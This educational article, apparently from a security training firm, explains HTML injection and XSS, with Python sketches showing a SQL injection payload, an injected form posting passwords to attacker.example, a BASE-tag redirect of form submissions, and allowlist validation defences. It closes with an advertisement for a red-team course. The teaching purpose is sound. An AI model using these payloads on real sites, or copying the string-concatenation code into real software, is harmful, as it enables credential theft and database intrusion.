HTML injection belongs to a larger family of injection attacks, in which an attacker submits malicious input that an unprepared web application processes without suspicion. The application may then return critical information that can be used to gain access to the server or database. The victim is almost always a web application, but it can also be an offline application that does not handle input safely.
Let’s dive in a little more.
Web pages mostly display information, but many also accept information from the user, either to customize what the page shows or to collect user details. This is usually done through forms, which contain fields such as text boxes and option buttons for entering names or search phrases and selecting options. When the form is submitted, the information is sent to the server, which uses these keywords or names for backend processing.
In short, the server runs some backend code with the supplied information and returns a result that is useful to the user. This is where an experienced attacker finds an opening to make the server return unintended, unprotected information, including table structures, usernames and passwords, personally identifiable information of customers and more. Instead of a regular search phrase, the attacker sends a sequence of characters crafted to blend with the backend query and form a more potent statement than the intended one. When the backend server runs it against the database, it inadvertently executes what the attacker wanted.
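To make the idea concrete, here is a minimal sketch of how attacker input can blend with a backend query. It assumes a hypothetical `users` table in an in-memory SQLite database; the table, the function names and the payload are illustrative and not taken from any real application.

```python
import sqlite3


def build_db():
    """Create a throwaway in-memory database with a hypothetical users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "a-secret"), ("bob", "b-secret")],
    )
    return conn


def search_unsafe(conn, name):
    # Vulnerable: the user input becomes part of the SQL text itself.
    query = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(query)]


def search_safe(conn, name):
    # Safer: the input is passed as a bound parameter, so it stays data.
    query = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(query, (name,))]


conn = build_db()
payload = "' OR '1'='1"  # blends with the query and makes the condition always true

unsafe_rows = search_unsafe(conn, payload)  # matches every row in the table
safe_rows = search_safe(conn, payload)      # matches nothing
```

In the unsafe version the payload turns the condition into `name = '' OR '1'='1'`, which is true for every row, while the parameterized version treats the same text as an ordinary (and non-matching) name.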
The injected code takes many forms, with the most potent ones used in XSS and SQL injection attacks. As you might have guessed, there are many types of injection attack, including code injection, CRLF injection, Cross-site Scripting (XSS), email header injection, host header injection, LDAP injection, OS command injection, XPath injection and HTML injection.
In this article we shall focus on HTML injection, an injection type that is closely related to Cross-site Scripting (XSS).
In Cross-site Scripting, the attacker injects an arbitrary script, usually JavaScript, into a website or web application through input text fields, and the script then gets executed in the victim’s browser. We will look at HTML injection now and then come back to how the two are related.
If you have any experience with web pages, you probably know that HTML is not program code per se but a sequence of tags that instruct the browser how to render a page. Attackers use HTML injection to insert tags of their own and cause harm in many ways, such as changing the visible content of a web page, creating an illegitimate form to collect information from the user, or extracting anti-CSRF tokens (CSRF stands for Cross-Site Request Forgery). HTML injection is also known to be used for extracting passwords stored in a browser.
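The following sketch shows how an injected tag ends up as real markup when a page is built by plain string concatenation. The `render_greeting` function, the payload and the `attacker.example` address are hypothetical; Python's standard `html.parser` module stands in for the browser and simply lists the tags it sees.

```python
from html.parser import HTMLParser


class TagCollector(HTMLParser):
    """Records the name of every opening tag found in a piece of markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def render_greeting(name):
    # Vulnerable: user input is pasted into the page without any checks.
    return "<p>Hello, " + name + "</p>"


def tags_in(markup):
    collector = TagCollector()
    collector.feed(markup)
    return collector.tags


benign_tags = tags_in(render_greeting("Alice"))

# Hypothetical payload: an illegitimate form that posts to the attacker's site.
payload = (
    '<form action="https://attacker.example/collect">'
    '<input name="password"></form>'
)
injected_tags = tags_in(render_greeting(payload))
```

With the benign name the page contains only the paragraph tag. With the payload, the parser also reports a `form` and an `input` element, which is exactly how a browser would interpret the page.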
Let’s get to how this compares with Cross-site Scripting, which is considered more potent.
In a Cross-site Scripting attack, the injected text is script code that the browser supports, typically JavaScript. Cross-site Scripting, also known as XSS, is considered more potent because the injected content is not mere tags but code that can be executed to accomplish much more.
Some of the most common uses of HTML injection are described below.
In some cases, attackers use HTML injection to change the way a website displays content. For example, an advertisement that the attacker wants to promote can be injected into the web page. Some attacks containing malicious HTML are aimed at harming the reputation of a website, mostly for political or personal reasons.
HTML injection may also be used to extract sensitive personal information by redirecting form submissions to the attacker’s site, as in the following example.
A simple example uses the HTML tag called BASE. If the web application uses relative URLs for form submission, the browser resolves them against a base URL, which by default is the address of the page itself. If an attacker changes this base URL with an injected BASE tag, all form submissions that use relative URLs are sent to the attacker’s base site instead. A single line like <base href='https://example.com/'> will do.
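The effect of the BASE tag can be sketched with Python's standard `urllib.parse.urljoin`, which resolves relative URLs much as a browser does. The page address `https://shop.example/account/settings` and the form action `update-profile` are made up for illustration; `https://example.com/` plays the attacker's site, as in the text above.

```python
from urllib.parse import urljoin


def resolve_form_action(page_url, action, base_href=None):
    """Return the absolute URL a relative form action would be submitted to.

    Without a BASE tag the page's own URL is the base. With one, the
    href of the BASE tag takes over.
    """
    base = urljoin(page_url, base_href) if base_href else page_url
    return urljoin(base, action)


page_url = "https://shop.example/account/settings"  # hypothetical page
action = "update-profile"                           # relative form action

normal_target = resolve_form_action(page_url, action)
hijacked_target = resolve_form_action(page_url, action, "https://example.com/")
```

Without the injected tag, the form posts to `https://shop.example/account/update-profile`. With it, the same unchanged form posts to `https://example.com/update-profile`.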
Other ingenious ways that HTML injection is put to use are for the extraction of anti-CSRF tokens, extraction of usernames and passwords and more.
The most dependable defence against HTML injection is an allowlist (whitelist) based filter, which accepts only input known to be safe and so weeds out any HTML tags from the input text. You can also place your own base tag in the page to override any that attackers might have planted. It is good practice to combine protection against HTML injection with protection against XSS, as in both cases you are looking to weed out input that may alter the operation of your web application. Checking input in this way before it is processed is called validation.
There is a caveat, though. A simple validation that removes all such keywords will also reject legitimate user input, such as URLs, in places where it is needed. So the application must validate each input in the context of the type of input expected.
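As a rough sketch of the allowlist idea, the check below accepts a value only if every character belongs to a small permitted set. The username rule (letters, digits, underscore, dot and hyphen, up to 32 characters) is an assumption chosen for illustration, not a recommendation for any particular application.

```python
import re

# Hypothetical allowlist for a username field: only these characters,
# between 1 and 32 of them, are accepted.
USERNAME_PATTERN = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_valid_username(value):
    """Return True only if the whole value matches the allowlist."""
    return USERNAME_PATTERN.fullmatch(value) is not None


accepted = is_valid_username("alice_01")
rejected = is_valid_username("<base href='https://example.com/'>")
```

Because the rule describes what is allowed rather than what is forbidden, angle brackets, quotes and spaces are rejected without having to list every dangerous tag.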
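One way to picture validation in context is to give each type of field its own rule, so that a URL field accepts URLs while a name field does not. The field types, patterns and helper names below are assumptions made for this sketch.

```python
import re
from urllib.parse import urlsplit

# Hypothetical rule for a personal-name field.
NAME_PATTERN = re.compile(r"[A-Za-z][A-Za-z .'-]{0,63}")

# Characters that have no place in a URL field and could start or
# break out of an HTML tag or attribute.
FORBIDDEN_IN_URL = set("<>\"'` \t\r\n")


def validate_name(value):
    return NAME_PATTERN.fullmatch(value) is not None


def validate_url(value):
    if any(ch in FORBIDDEN_IN_URL for ch in value):
        return False
    try:
        parts = urlsplit(value)
    except ValueError:
        return False
    # Only plain web addresses with a host are accepted.
    return parts.scheme in ("http", "https") and bool(parts.netloc)


VALIDATORS = {"name": validate_name, "url": validate_url}


def validate(field_type, value):
    """Apply the rule for the given field type; unknown types are rejected."""
    validator = VALIDATORS.get(field_type)
    return validator is not None and validator(value)


url_value = "https://example.com/page?id=1"
url_in_url_field = validate("url", url_value)    # legitimate URL is accepted
url_in_name_field = validate("name", url_value)  # same text is rejected as a name
tag_in_url_field = validate("url", "https://example.com/'><base href=x>")
```

The same string is acceptable in one field and rejected in another, which is the point of validating against the expected type of input rather than against a single global list of keywords.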
It is important to secure your application if it accepts input from the user in any form. There are tools that help with this kind of defence against HTML injection attacks. You might want to look at the benefits they offer before deciding on the best one for your setup.
So, have you made up your mind to make a career in Cyber Security? Visit our Master Certificate in Cyber Security (Red Team) for further help. It is the first program in offensive technologies in India and allows learners to practice in a real-time simulated ecosystem that will give them an edge in this competitive world.